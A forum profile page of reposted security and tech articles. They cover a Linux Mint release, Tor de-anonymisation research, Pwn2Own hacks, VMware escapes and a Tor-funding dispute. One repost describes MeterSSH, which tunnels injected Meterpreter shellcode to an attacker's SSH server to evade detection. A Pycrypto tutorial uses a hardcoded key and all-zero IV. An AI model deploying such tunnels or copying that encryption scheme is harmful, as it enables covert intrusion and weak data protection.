Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. [h=2]Linux Mint 17.1 “Rebecca” MATE RC released![/h] The team is proud to announce the release of Linux Mint 17.1 “Rebecca” MATE RC. Linux Mint 17.1 Rebecca MATE Edition Linux Mint 17.1 is a long term support release which will be supported until 2019. It comes with updated software and brings refinements and many new features to make your desktop even more comfortable to use. New features at a glance: Out of the box support for Compiz Update Manager Language Settings Login Screen System Improvements Artwork Improvements Other Improvements Main Components LTS Strategy For a complete overview and to see screenshots of the new features, visit: “What’s new in Linux Mint 17.1 MATE“. Important info: Issues with Skype DVD Playback with VLC Bluetooth EFI Support Solving freezes with some NVIDIA GeForce GPUs Booting with non-PAE CPUs Other issues Make sure to read the “Release Notes” to be aware of important info or known issues related to this release. System requirements: x86 processor (Linux Mint 64-bit requires a 64-bit processor. Linux Mint 32-bit works on both 32-bit and 64-bit processors). 512 MB RAM (1GB recommended for a comfortable usage). 5 GB of disk space (20GB recommended). Graphics card capable of 800×600 resolution (1024×768 recommended). CD/DVD drive or USB port Bug reports: Please report bugs below in the comment section of this blog. Please visit https://github.com/linuxmint/Roadmap to follow the progress of the development team between the RC and the stable release. Download: Md5 sum: 32-bit: a6f43b493cdec449e3232317f2b6e301 64-bit: 0609ad34999d7cae3d3689b9390fc05b Torrents: 32-bit 64-bit HTTP Mirrors for the 32-bit DVD ISO: Argentina Xfree Australia AARNet Australia Internode Australia uberglobal Australia Western Australian Internet Association Austria Goodie Domain Service Bangladesh dhakaCom Limited Bangladesh IS Pros Limited Belarus ByFly Belgium Cu.be Solutions Brazil Universidade Federal do Parana Bulgaria Telepoint Canada University of Waterloo Computer Science Club China Qiming College of Huazhong University of Science and Technology China University of Science and Technology of China Linux User Group Colombia EDATEL Czech Republic CZ.NIC Czech Republic Ignum, s.r.o. Czech Republic UPC Ceska republika Denmark iODC Ecuador CEDIA France Crifo.org France finn.lu France Gwendal Le Bihan France IRCAM France Ordimatic Germany Artfiles Germany FH Aachen Germany Friedrich-Alexander-University of Erlangen-Nuremberg Germany GWDG Germany Hochschule Esslingen University of Applied Sciences Germany NetCologne GmbH Greece Hellenic Telecommunications Organization Greece National Technical University of Athens Greece University of Crete Greenland Tele Greenland Iceland Siminn hf Indonesia Jaran.undip Ireland HEAnet Israel Israel Internet Association Italy GARR Kazakhstan Neolabs Luxembourg root S.A. Netherlands NLUUG Netherlands Triple IT New Caledonia OFFRATEL LAGOON New Zealand University of Canterbury New Zealand Xnet Philippines PREGINET Poland ICM – University of Warsaw Poland Piotrkosoft Poland Polish Telecom Portugal Universidade do Porto Romania ServerHost Russia Yandex Team Serbia University of Kragujevac Singapore NUS – School of Computing – SigLabs Slovakia Rainside South Africa University of Free State South Africa Web Africa South Korea KAIST South Korea NeowizGames corp Spain Oficina de Software Libre do Cixug Sweden DF – Computer Society at Lund University Sweden Portlane Switzerland SWITCH Taiwan NCHC Taiwan Southern Taiwan University of Science and Technology Taiwan TamKang University Taiwan Yuan Ze University, Department of Computer Science and Engineering United Kingdom Bytemark Hosting United Kingdom University of Kent UK Mirror Service USA Advanced Network Computing Lab at the University of Hawaii USA advancedhosters.com USA Go-Parts USA James Madison University USA kernel.org USA MetroCast Cablevision USA Mirror.pw USA mirrorcatalogs.com USA Nexcess USA Secution, LLC. USA Team Cymru USA University of Oklahoma USA US Internet USA XMission Internet Vietnam FPT Telecom HTTP Mirrors for the 64-bit DVD ISO: Argentina Xfree Australia AARNet Australia Internode Australia uberglobal Australia Western Australian Internet Association Austria Goodie Domain Service Bangladesh dhakaCom Limited Bangladesh IS Pros Limited Belarus ByFly Belgium Cu.be Solutions Brazil Universidade Federal do Parana Bulgaria Telepoint Canada University of Waterloo Computer Science Club China Qiming College of Huazhong University of Science and Technology China University of Science and Technology of China Linux User Group Colombia EDATEL Czech Republic CZ.NIC Czech Republic Ignum, s.r.o. Czech Republic UPC Ceska republika Denmark iODC Ecuador CEDIA France Crifo.org France finn.lu France Gwendal Le Bihan France IRCAM France Ordimatic Germany Artfiles Germany FH Aachen Germany Friedrich-Alexander-University of Erlangen-Nuremberg Germany GWDG Germany Hochschule Esslingen University of Applied Sciences Germany NetCologne GmbH Greece Hellenic Telecommunications Organization Greece National Technical University of Athens Greece University of Crete Greenland Tele Greenland Iceland Siminn hf Indonesia Jaran.undip Ireland HEAnet Israel Israel Internet Association Italy GARR Kazakhstan Neolabs Luxembourg root S.A. Netherlands NLUUG Netherlands Triple IT New Caledonia OFFRATEL LAGOON New Zealand University of Canterbury New Zealand Xnet Philippines PREGINET Poland ICM – University of Warsaw Poland Piotrkosoft Poland Polish Telecom Portugal Universidade do Porto Romania ServerHost Russia Yandex Team Serbia University of Kragujevac Singapore NUS – School of Computing – SigLabs Slovakia Rainside South Africa University of Free State South Africa Web Africa South Korea KAIST South Korea NeowizGames corp Spain Oficina de Software Libre do Cixug Sweden DF – Computer Society at Lund University Sweden Portlane Switzerland SWITCH Taiwan NCHC Taiwan Southern Taiwan University of Science and Technology Taiwan TamKang University Taiwan Yuan Ze University, Department of Computer Science and Engineering United Kingdom Bytemark Hosting United Kingdom University of Kent UK Mirror Service USA Advanced Network Computing Lab at the University of Hawaii USA advancedhosters.com USA Go-Parts USA James Madison University USA kernel.org USA MetroCast Cablevision USA Mirror.pw USA mirrorcatalogs.com USA Nexcess USA Secution, LLC. USA Team Cymru USA University of Oklahoma USA US Internet USA XMission Internet Vietnam FPT Telecom Enjoy! We look forward to receiving your feedback. Thank you for using Linux Mint and have a lot of fun testing the release candidate! Sursa: The Linux Mint Blog » Blog Archive » Linux Mint 17.1 “Rebecca” MATE RC released!
  2. Encrypting files with Pycrypto Pycrypto is the python cryptography toolkit you'll ever need. It supports pretty much everything, it's rather fast and has an understandable interface and documentation. Cryptography, in itself, is rather complicated and hard to understand and implement, and so is the documentation on encrypting files with pycrypto (or pretty much any crypto toolkit/library in the world). Recently, I was tasked with writing a code that will encrypt files to be decrypted on a mobile platform - Android and iOS. Both of their documentations are lacking in that department. You can easily find a snippet so that you can encrypt and decrypt a file on the same device, but not something that will work cross-device/cross-platform. That's because some of the details of the encryption algorithms are not mentioned and those are crucial. ELI5 AES AES is a block cypher. That means, it encrypts/decrypts in blocks of 128 bits. The key used for the [en|de]cryption is 128, 192 or 256 bits. So, this means that your data has to be divisible by 128bits and your key must be 128, 192 or 256 bits. Pretty tough to meet these requirements considering we're dealing with binary/text files that will be some random length? Well, that's where padding comes in. In order to make the file's length divisible by 128b(16B) we have to pad it. The most used padding scheme is PKCS7 Simply append n < 16 bytes to the file with value n to meet the 16B block size. So, the workflow now would be, pad -> encrypt -> decrypt -> unpad. There's one more thing - IV - Should also be 16B. It's a common practice to have this at random, prepend it to the file on every encryption. We'll assume a static IV now for the sake of simplicity. The documentations around the net don't mention the IV. Then, the crypto system creates it per device, and you'll be stuck wondering how you can decrypt on your phone but not your desktop. Enter AES256/CBC/PKCS7 This is the cookie cutter scheme for encryption. It's supported by the mobile OS-es and libraries, it's even the default! Doing this with openssl is easy: # To Encrypt openssl enc -aes-256-cbc -k LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE -iv 0000000000000000 -in in_file -out out_file # To Decrypt openssl enc -d -aes-256-cbc -k LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE -iv 0000000000000000 -in in_file -out out_file In this example, the key is set to LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE (32B/256b) and the IV is set to 16B of zeroes. Openssl pads with PKCS7 by default. Now let's see the example with pycrypto. Assuming with have in_file and out_file already opened: # initialize the encryption encryption_key = "LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE" iv = 16 * '\x00' crypt = AES.new(encryption_key, AES.MODE_CBC, iv) # keep chunk size large for speed but divisible by 16B chunksize = 1024 while True: chunk = infile.read(chunksize) if len(chunk) == 0: # it's an empty chunk. We don't need it. break elif len(chunk) == chunksize: # We've read a full encryptable chunk with length divisible by 16B out_file.write(crypt.encrypt(chunk)) else: # We've read a chunk that's not divisible by 16B. We PCKS7 pad it. # First calculate how many bytes we'll need to pad it padding_bytes = 16 - len(chunk) % AES.block_size # Next, create the padding sequence padding = StringIO.StringIO() for _ in xrange(padding_bytes): # If we're missing 4 bytes, the padding sequence would be 04 04 04 04 (hex). That's why the formatting. padding.write('%02x' % padding_bytes) padded_chunk = chunk + binascii.unhexlify(padding.getvalue()) out_file.write(crypt.encrypt(padded_chunk)) That's it. This should be decryptable with openssl, android crypto, ios crypto library and any device. Just need to know the encryption scheme, the IV and the encryption key. If you really want to make something secure, I suggest you think about making a random IV each time the function is called. Sursa: Encrypting files with Pycrypto
  3. [h=1]Chainfire Releases CF-Auto-Roots For Nexus Line[/h] Posted November 15, 2014 at 11:09 am by jerdog Benjamin Franklin, the US Statesman from simpler times, gave the famous quote in 1789 that “…in this world nothing can be said to be certain, except death and taxes.” I can’t fault him for not having the forethought to identify that there would be a few more certainties in life, and those would be “Chainfire releasing root for Nexus devices and providing analysis of the state of root on a new Google release.” For those not familiar, XDA Senior Recognized Developer Chainfire has become the preeminent source for information related to root on Android devices as well as analysis of how Google is changing system security on their new Android OS updates. His Google+ posts are often waited on with anticipation rivaling the title of the next Star Wars installment. Ok, so maybe that’s a bit of a stretch – there weren’t any Watch Parties for the Star Wars announcement. With that being said, he recently updated his CF-Auto-Root downloads to include Android 5.0 root for all of the Nexus line: Nexus 4, Nexus 5, Nexus 7 2012, Nexus 7 2013, Nexus 9, and Nexus 10. A few of the key things changed for this release are: The new variants of CFAR have the SuperSU ZIP embedded A second included ZIP (if on Lollipop or newer) patches the current kernel to run SuperSU at boot Current CFARs have SuperSU v2.20 which is not currently available elsewhere and only has CFAR compatibility For more information, make sure you check out the CFAR thread and his G+ stream to stay current on all Lollipop-related news. Sursa: Chainfire Releases CF-Auto-Roots For Nexus Line - XDA Forums
  4. 81% of Tor users can be de-anonymised by analysing router information, research indicates Martin Anderson, The Stack Friday 14 November, 2014 Research undertaken between 2008 and 2014 suggests that more than 81% of Tor clients can be ‘de-anonymised’ – their originating IP addresses revealed – by exploiting the ‘Netflow’ technology that Cisco has built into its router protocols, and similar traffic analysis software running by default in the hardware of other manufacturers. Professor Sambuddho Chakravarty, a former researcher at Columbia University’s Network Security Lab and now researching Network Anonymity and Privacy at the Indraprastha Institute of Information Technology in Delhi, has co-published a series of papers over the last six years outlining the attack vector, and claims a 100% ‘decloaking’ success rate under laboratory conditions, and 81.4% in the actual wilds of the Tor network. Chakravarty’s technique [PDF] involves introducing disturbances in the highly-regulated environs of Onion Router protocols using a modified public Tor server running on Linux - hosted at the time at Columbia University. His work on large-scale traffic analysis attacks in the Tor environment has convinced him that a well-resourced organisation could achieve an extremely high capacity to de-anonymise Tor traffic on an ad hoc basis – but also that one would not necessarily need the resources of a nation state to do so, stating that a single AS (Autonomous System) could monitor more than 39% of randomly-generated Tor circuits. Chakravarty says: “…it is not even essential to be a global adversary to launch such traffic analysis attacks. A powerful, yet non- global adversary could use traffic analysis methods […] to determine the various relays participating in a Tor circuit and directly monitor the traffic entering the entry node of the victim connection,” The technique depends on injecting a repeating traffic pattern – such as HTML files, the same kind of traffic of which most Tor browsing consists – into the TCP connection that it sees originating in the target exit node, and then comparing the server’s exit traffic for the Tor clients, as derived from the router’s flow records, to facilitate client identification. Tor is susceptible to this kind of traffic analysis because it was designed for low-latency. Chakravarty explains: “To achieve acceptable quality of service, [Tor attempts] to preserve packet interarrival characteristics, such as inter-packet delay. Consequently, a powerful adversary can mount traffic analysis attacks by observing similar traffic patterns at various points of the network, linking together otherwise unrelated network connections.” The online section of the research involved identifying ‘victim’ clients in Planetlab locations in Texas, Belgium and Greece, and exercised a variety of techniques and configurations, some involving control of entry and exit nodes, and others which achieved considerable success by only controlling one end or the other. Traffic analysis of this kind does not involve the enormous expense and infrastructural effort that the NSA put into their FoxAcid Tor redirects, but it benefits from running one or more high-bandwidth, high-performance, high-uptime Tor relays. The forensic interest in quite how international cybercrime initiative ‘Operation Onymous’ defied Tor’s obfuscating protocols to expose hundreds of ‘dark net’ sites, including infamous online drug warehouse Silk Road 2.0, has led many to conclude that the core approach to deanonymisation of Tor clients depends upon becoming a ‘relay of choice’ – and a default resource when Tor-directed DDOS attacks put ‘amateur’ servers out of service. Sursa: 81% of Tor users can be de-anonymised by analysing router information, research indicates
  5. Nexus 5, Galaxy S5 and iPhone 5s hacked at Pwn2Own event The Samsung Galaxy S5, Apple iPhone 5s and Google Nexus 5 were amongst handsets to be successfully hacked during the Mobile Pwn2Own hacking competition, reports Forbes. The event is an annual competition which offers cash prizes to those that can reveal security weaknesses in handsets. Sponsored by BlackBerry and Google Android, the event offered a total prize pool of $425,000 to those who could hack the handsets, and prizes were offered pretty quickly as just one day into the two-day event, the iPhone 5s, Samsung Galaxy S5, Nexus 5 and Amazon Fire Phone were all successfully hacked. International Business Times has some more details on the hacks of each handset. It reports that the iPhone 5s fell to “a combination of two vulnerabilities” which allowed the attackers to to hack it via the Safari browser, achieving a ‘full sandbox escape.’ The Samsung Galaxy S5 and Google Nexus 5, on the other hand, both fell foul to exploits using the NFC chip – this wasn’t an option in the iPhone 5s, which does not have one, though the recently released iPhone 6 has introduced the chip for the first time. The Amazon Fire Phone, which runs a customized version of Android, fell “using a combination of three separate vulnerabilities”. Bad news for iOS and Android phones then, but what of Windows Phone? Well, according to Ars Technica, a single hacker attempted to take on the Lumia 1520, but was rebuffed. The hacker was apparently “able to exfiltrate the cookie database”, but “unable to gain full control of the system.” HP, that runs the event as part of its Zero Day Initiative, will release more detail on the nature of the hacks once the companies have had time to patch the vulnerabilities. Bloomua / Shutterstock.com Author Editor, ESET Sursa: Nexus 5, Galaxy S5 and iPhone 5s hacked at Pwn2Own event
  6. MeterSSH – Meterpreter over SSH As penetration testers, it’s crucial to identify what types of attacks are detected and what’s not. After running into a recent penetration test with a next generation firewall, most analysis has shifted away from the endpoints and more towards network analysis. While there needs to be a mixture of both, MeterSSH demonstrates how easy it is to circumvent a lot of these signature based “next generation” product lines. MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker machine through an SSH tunnel and all self contained into one single Python file. Python can easily be converted to an executable using pyinstaller or py2exe. MeterSSH is easy – simply edit the meterssh.py file and add your SSH server IP, port, username, and password and run the script. It will spawn meterpreter through memory injection (in this case a windows/meterpreter/bind_tcp) and bind to port 8021. Paramiko (python SSH module) is used to tunnel meterpreter over 8021 and back to the attacker and all communications tucked within that SSH tunnel. Here we launch our initial meterssh payload: Next we launch monitor.py which monitors or the SSH connection and automatically launches Metasploit for you. Once it detects the SSH connection and shell, it kicks off Metasploit for you: Next, Metasploit is launched and notice that we are tunneling through localhost to the victim machine. There are two files, monitor.py and meterssh.py. monitor.py – run this in order to listen for an SSH connection, it will poll for 8021 on localhost for an SSH tunnel then spawn Metasploit for you automatically to grab the shell. meterssh.py – this is what you would deploy to the victim machine – note that most windows machines wont have Python installed, its recommended to compile Python with py2exe or pyinstaller. Fields you need to edit inside meterssh.py user = “sshuser” # password for SSH password = “sshpw” # this is where your SSH server is running rhost = “192.168.1.1” # remote SSH port – this is the attackers SSH server port = “22” user – this is the user account for the attackers SSH server (do not use root, does not need root) password – this is the password for the attackers SSH server rhost – this is the attackers SSH server IP address port – this is the attackers SSH server port Note that you DO NOT need to change the Metasploit shellcode, the Metasploit shellcode is simply an unmodified windows/meterpreter/bind_tcp that binds to port 8021. If you want to change this, just switch the shellcode out and change port 8021 inside the script to bind to whatever port you want to. You do not need to do this however unless you want to customize/modify. You can download meterssh from our github page: Download MeterSSH from Github By davek|November 14th, 2014 Sursa: https://www.trustedsec.com/november-2014/meterssh-meterpreter-ssh/
  7. +22: x64 binary ? x86 Hex-Rays Plus22 transforms x86_64 executables to be processed with 32-bit version of Hex-Rays Decompiler. This tool was created in mid-2013 for internal use in More Smoked Leet Chicken, and made public in November 2014 when Hex-Rays x64 finally came out. Usage php plus22.php [-va] {x64_binary.bin or listing.asm} If file name ends with '.asm', it will be interpreted as an ASM listing. Otherwise, it will be interpreted as x64 ELF/PE, and disassembled with IDA. -v be verbose and leave all temporary files -a AutoNop all lines with errors You can use _misc\php.exe to run the script. Plus22 is designed to run in Windows environment, and works well under Wine. Specifying your IDA path To decompile and restore types automatically, Plus22 needs to know where IDA is installed. You can add your path to $idaPaths array right at the top of script, or have it done for you automatically when Plus22 needs your IDA installation path. Without specifying IDA path, you can do the following by hand: Load binary in IDA64 View ? Unhide all (uncollapse functions) File ? Produce file ? Create ASM file php plus22.php mega_binary.asm If you're lucky, .obj is created. Load .obj in IDA File ? Script file... — execute mega_binary+22.idc for correct function types Files _misc\php.exe — compatible PHP version from PHP For Windows: _misc\original_instructions.idc — IDA script to manually load original instruction toggler _misc\functype.db — imported functions type database, parsed from IDA TIL collection _misc\jwasm.exe — fast Masm-like assembler from JWasm | SourceForge.net _misc\exporter.idc — ASM listing export helper IDA script _example\ — Network 300 from ebCTF 2013 Teaser processed with Plus22. This x64 binary uses raw socket API and heavily utilizes BN_* functions from OpenSSL. Changelog v0.3 [+] error correction mode: allows to fix ASM source interactively and re-compile right in +22 [+] '-a' command line switch: auto-nop all errors without user interaction v0.2.3 [+] type matching for float calling convention (XMM registers) [+] type guessing support for XMM [+] automatic 64-bit -> 32-bit constant truncation v0.2.2 [-] removed collapsed function handling [+] press Alt-Z to toggle between converted and original x64 instructions v0.2.1 [+] changeable calling convention: now supports windows x64 binaries [+] automatic main() detection [.] more compatible data types [.] variadic arguments expansion v0.2 [+] type matching for imports [+] type guessing for internal functions [+] fully automatic ELF disassembly v0.1.1 [+] clip_type_helper: automatic calling convention converter [.] more automatic patches v0.1 [+] directive and instruction patches [+] being able to build an x86 binary [.] collapsed function emulation Sursa: https://github.com/v0s/plus22
  8. A VMware Guest to Host Escape Story Kostya Kortchinsky Immunity, Inc. BlackHat USA 2009, Las Vegas Why deviices? ? I don't have enough lowlevel system Mojo ? ? They are common to all VMware products ? They “run” on the Host – vmwarevmx process ? They can be accessed from the guest – Through Port I/O or memorymapped I/O ? They are written in C/C++ ? They sometimes parse some complex data! Download: http://www.blackhat.com/presentations/bh-usa-09/KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-SLIDES.pdf
  9. How leading Tor developers and advocates tried to smear me after I reported their US Government ties By Yasha Levine On November 14, 2014 “I contract for the United States Government to build anonymity technology for them and deploy it.” — Roger Dingledine, cofounder of Tor, 2004 * * * About three months ago, I published an article exploring the deeply conflicted ties between agencies of the U.S. National Security State, and the Tor Network—an online anonymity tool popular among anti-surveillance privacy groups and activists, including Edward Snowden. My article traced the history of Tor and the US military-intelligence apparatus that spawned it—from Tor’s initial development by military researchers in the mid-1990s at the US Naval Laboratory in Washington DC, through its quasi-independent period after it was spun off as a nonprofit in 2004 but continued to receive most of its funding from a variety of government branches: Pentagon, State Department, USAID, Radio Free Asia. My article also revealed that Tor was created not to protect the public from government surveillance, but rather, to cloak the online identity of intelligence agents as they snooped on areas of interest. But in order to do that, Tor had to be released to the public and used by as diverse a group of people as possible: activists, dissidents, journalists, paranoiacs, kiddie porn scum, criminals and even would-be terrorists — the bigger and weirder the crowd, the easier it would be for agents to mix in and hide in plain sight. Finally, I pointed out that Tor was not nearly as secure as many of its proponents claimed. For people with really something to hide from the state, Tor very likely offered the opposite of anonymity: it singled out users for total NSA surveillance, with intel agencies potentially sucking up and recording everything they did online. Recent events have proven yet again that Tor is not as secure as its fans claim, or as its own developers say they hoped. All of this information is public, and it’s been out there for quite a while—but mostly in a scattered and fragmented way. As a result, the full story of Tor’s many pitfalls and contradictions has never been widely known by the public. So even people who should know better, and who care about this issue, have been promoting Tor as a grassroots anti-government surveillance tool without questioning or double-checking that story. When people are told about Tor’s roots in intelligence, and its ongoing funding from the Pentagon, they are usually shocked and surprised. So was I. The Tor story needed to be revisited, which I did, assembling all the verifiable facts, tax and financial records; public statements by Tor’s inventors and developers; published academic papers, and so on. Before publishing, we at Pando reached out multiple times to several key Tor people for comment; editors meticulously fact-checked the article before putting it up. One would’ve thought that an article warning about Tor’s little-known dangers and conflicts-of-interest would’ve been greeted by the privacy and anonymity community—that they would be more interested in protecting the public and getting Tor right, than in protecting Tor’s brand. But instead of being welcomed by the privacy community or sparking a discussion about the aspects of Tor that have been swept under the rug, the article was met with a smear campaign. Surprisingly, the smears weren’t waged by the usual fringe anonymous-troll types, but rather by some of the most prominent privacy and anti-surveillance names in the country—top people from groups like the ACLU, Electronic Frontier Foundation, Freedom of the Press Foundation, and Pierre Omidyar’s First Look Media. Curiously, not a single one of these critics disputed the facts in the story. There wasn’t a single factual error they could point to; so instead, they took to a range of familiar PR smear tactics—tactics one usually sees used by oil company PR flacks, but not by privacy hacktivists. First, they flooded social media telling anyone who showed interest in my article that they should ignore it; then when that didn’t work and the article caught fire, they tried to discredit it with crude insults, misdirection, and outright lies, even going as far as to claim that I’m funded by the CIA. From my experience, when your article produces bizarre hostile reactions like this it means you’ve hit on something important. Take Tor developer Andrea Shepard. As soon as my story went live, Shepard responded with a torrent of childish insults, calling me “Pandofilth” and “Yasha the Foul,” a “statist propagandist,” a “fucktard’s fucktard.” Shepard accused me of being funded by spooks, and ranted on and on about the various ways in which she said I had performed sexual favors for a male colleague. She hurled similar childish abuse at anyone she caught commenting positively about my article. When readers suggested to Shepard that she should instead offer a point-by-point rebuttal of my article, rather that swearing and insulting at anyone who mentioned it, she responded that my article wasn’t worth the effort of rebutting (only insulting), and that I don’t deserve to live: @Raed667 @headhntr Yasha Levine doesn’t merit that kind of effort. Frankly, he doesn’t merit *oxygen*. — Andre? (@puellavulnerata) July 18, 2014 Jacob Appelbaum, another Tor developer who crisscrosses the globe promoting it as a tool against government surveillance, had refused my multiple requests for comment when I was working on the article. When it was published, he called my reporting “a bunch of bullshit”, but refused to elaborate with a substantive rebuttal. Instead, Appelbaum made vague suggestions that I was driven by dark and mysterious motives: @gbelljnr I don’t. I don’t have time for jerks who use that nonsense to service their other agenda. Boring waste of time. — Jacob Appelbaum (@ioerror) October 26, 2014 Perhaps it’s somewhat understandable that salaried Tor developers like Andrea Shepard and Jacob Appelbaum went on the attack. Shepard is a libertarian (which is why she called me “statist”—a harsh epithet in her libertarian world); Appelbaum is a bit of a celebrity in the anti-surveillance community, having helped set up Wikileaks, and lately being constantly profiled as a rebel-fugitive hiding out in Berlin from his NSA pursuers. Both Appelbaum and Shepard circulate in radical anti-police state circles, and my article pointed out that they earn $100,000-plus annual salaries working for a nonprofit federal government security contractor—a nonprofit that gets at least three-quarters of its annual funding from the Pentagon, State Department, and other federal agencies. In other words, Tor anti-National Security State rebels are living off the largesse of their NatSec State nemesis. But it wasn’t only Tor employees who were determined to discredit my reporting. Take Jillian York, “Director for International Freedom of Expression” at the Electronic Frontier Foundation, a tech industry lobby group funded by Silicon Valley’s largest corporations. As soon as the story came out, she counseled her 45,000 followers to ignore my story: @puellavulnerata yeah I just don’t see the news here. — Jillian C. York (@jilliancyork) July 17, 2014 The reason? Because it was not being shared very much on social media: @puellavulnerata well, it seems like only 15 or so people have bothered to tweet the article, so… — Jillian C. York (@jilliancyork) July 17, 2014 (I’m not convinced that social traffic is a meaningful measure of an article’s importance but, for what it’s worth, the piece currently has around 1.5k Twitter shares and a little over 4k Facebook likes.) Morgan Marquis-Boire, a former Googler who was recently poached by Pierre Omidyar to run security at First Look, called me a loony conspiracy theorist for reporting on Tor’s government funding—but then contradicted himself by arguing that this “conspiracy theory” is a matter of public record. It was a baffling, oxymoronic argument to make—accusing my article of being both a wild conspiracy theory, yet also boring old news that no one should bother reading—but for some reason, Tor defenders thought this self-contradiction made perfect logical sense: I wish all the @torproject conspiracy theorists would just read the damn website https://t.co/bYo88BNY81 — Morgan Mayhem (@headhntr) July 28, 2014 Pando’s Tor conspiracy piece stops just short of the real truth… That Roger Dingledine is really Senator Palpatine Almost everyone involved in developing Tor was (or is) funded by the US government | PandoDaily — Morgan Mayhem (@headhntr) July 18, 2014 @ggreenwald @torproject they get funding from USG?? “…which houses the NSA.” -> connect the dots sheeple! — Morgan Mayhem (@headhntr) July 28, 2014 Christopher Soghoian, who works on privacy policies for the ACLU, took the lowest, scummiest road. Soghoian compared my reporting on Tor to the Protocols of the Elders of Zion, a sick anti-Semitic forgery disseminated by the Tsar’s secret police, unleashing waves of deadly pogroms against Jews across the Russian Empire in the early 20th century. As a refugee from the Soviet Union whose family escaped from state sponsored anti-Semitism, I found Soghoian’s comparison to be outrageously offensive and disgusting. It seems that Tor is developed by the Elders of Zion, and @ioerror is responsible for 9/11. Almost everyone involved in developing Tor was (or is) funded by the US government | PandoDaily Hall of Mirrors: Wikileaks volunteer helped build Tor, was funded by the Pentagon | PandoDaily — Christopher Soghoian (@csoghoian) August 6, 2014 I tried to confront Soghoian over his disgusting anti-Semitic smear against me: Last thing I need is for you, @csoghoian, to smear my reporting by comparing to virulent anti-Semitic propaganda. — Yasha Levine (@yashalevine) August 6, 2014 But the ACLU’s Soghoian brushed it off with snark: @yashalevine you want to talk about offensive? Look at your Twitter background image. Totally unfair to @RogerDingledine. — Christopher Soghoian (@csoghoian) August 6, 2014 And mocked me as a mentally ill paranoiac: @exiledonline Your pal is a conspiracy theorist who sees black helicopters everywhere. Go read his hatchet job against Tor, — Christopher Soghoian (@csoghoian) August 6, 2014 Only later, after getting his smears out of his system, Soghoian was finally able to formulate something of a critique. It boiled down to this: He did not like my article because it raised questions about Tor’s longstanding financial relationship with the US government’s military-intelligence agencies—which he found irrelevant, allowing only for purely technical critiques as relevant: “My beef is that your article has no solid technical criticism, but some hand waving about funding. There are so many things you could have nailed Tor for, but instead, you went for lazy low hanging fruit about funding.” What were these many things I could have nailed Tor for? Well, he was helpful enough to give me a couple of suggestions: “There are many things about Tor to worthy of criticism: A crappy user interface, no auto security updates, no browser sandbox. Your attacks against Tor’s state dept funding, or Roger’s summer internship in college at the NSA, are stupid though.” Yes, what sane journalist would care that Tor was created by military intelligence, is currently funded by the government and is almost certainly a giant honeypot. That’s all secondary and “low hanging fruit” compared to the big giant issue of our day: Tor’s crappy user interface. I thought I’d seen it all when an ACLU technology celebrity took to hurling anti-Semitic smears against my reporting. Until last week. That’s when the Los Angeles Review of Books published an article by a computer researcher/privacy activist named Harry Halpin. The article purported to be a review of Julian Assange’s new book, “When Google Met Wikileaks”—but in the middle of his review, Halpin went off on a longwinded tangent attacking me. He called me a conspiracy theorist for reporting on Tor’s government funding, and falsely accused me and PandoDaily of being funded by the CIA: If Levine is looking for a pot of magical money that has not been touched by the evils of this world, he could always look at his own employer PandoDaily. Levine and PandoDaily are publicly funded by Greylock Partners, who are senior partners with the [sic] In-Q-Tel, the venture capital wing of the CIA. So, the CIA funded Yasha Levine when he exposed that the State Department funded Tor in order to defend CIA agents. The problem with conspiracy theories — including any analysis of conspiracies as networks — is that one immediately runs up against the incommensurable reality of late capitalism: everything is actually connected. Halpin later admitted that he lied about the CIA-Pando link, saying he did so in order to “prove” a larger point: that investigative journalism that follows the money—like reporting on Tor’s government financing—is nothing but useless conspiracy mongering. Why? Because everything is “connected” so it’s just silly (and a bit crazy) to make a connection between funding and influence. Halpin’s editor added two corrections to the piece, including rewording my alleged CIA link to read “So one could argue that the CIA funded Yasha Levine…” And, yes, one could argue that, assuming one was happy to fabricate facts from whole cloth. As it turned out, Halpin, like the Tor developers and their defenders, had other reasons to try to discredit reporting on funding and conflicts-of-interest. Halpin is the president of LEAP, a small privacy/encryption outfit that gets most of its funding from various government sources—including more than $1 million from Radio Free Asia’s “Open Technology Fund.” This fund just happens to be a major financial backer of the Tor Network; last year alone, the Open Technology Fund gave Tor $600,000. The fund also happens to be run out of the Broadcasters Board of Governors (BBG), an old CIA spinoff dedicated to waging propaganda warfare against regimes hostile to US interests. The BBG—which until recently was called the International Broadcasting Bureau—has also been one of the biggest backers of Tor going back to 2007. So… Halpin attacks me for reporting on Tor’s conflicted government financing—getting money from the very entities Tor purports to protect the public from—while his privacy startup is funded by same government agency that funds Tor. And in one of the craziest twists, Halpin—who lied about my and Pando’s CIA ties—turns out to be funded by an organization that was founded by the CIA. No “one could argue” about it. It doesn’t get more absurd than this—or more unethical. When the attacks first started a few months back, I had thought maybe they were driven by a petty defensive reflex: Many were vocal and public supporters of Tor and recommended it to others as an effective tool to protect them from government surveillance. Perhaps the article made them look or feel stupid — after all, no one likes being outed as a sucker. But as the attacks on my article rolled on, month after month, I began to realize there was something more going on, for the oldest reason in the books: self-interest, and money. Most of the privacy activists who attacked my reporting had spent their careers moving through the same tight circle of advocacy groups, think-tanks and nonprofits—all funded by the same small network of government and corporate foundations that fund Tor: Radio Free Asia, State Department, Google, Peirre Omidyar, Ford Foundation. These were people circling the wagons and protecting themselves by smearing critical reporting on Tor’s funding. Take EFF’s Jillian York. After continuously mocking and playing down concerns about Tor’s funding, York penned an article—”Why we need Tor now more than ever”—that hard-sold Tor as the best and most urgent way for users to protect themselves from government Big Brother surveillance. York made no mention of the government’s ongoing sponsorship of Tor; instead she misrepresented Tor as totally independent since 2006. Without elaborating, she claimed that it “receives funding from a range of sources, including individual donors”: Initially developed by the U.S. Naval Research Laboratory and DARPA, Tor (which originally stood for “the onion router”) is free software that enables anonymity and censorship circumvention. Since 2006, the Tor Project has operated as a nonprofit organization based out of Massachusetts; it receives funding from a range of sources, including individual donors. Karen Reilly, the Tor Project’s development director, told me that since the organization enabled donations with Bitcoin—the peer-to-peer payment system that allows users to send money anonymously—the organization has seen an uptick in donations, an unsurprising development given their user base. This is crude sophistry that does a disservice to York’s readers. Sure, Tor might receive funding from a “range of sources,” but the overwhelming majority of Tor’s funding comes from just one: the United States Government, which has continued to provide anywhere from 70 to 100% of Tor’s annual budget since 2007. Jillian York, of all 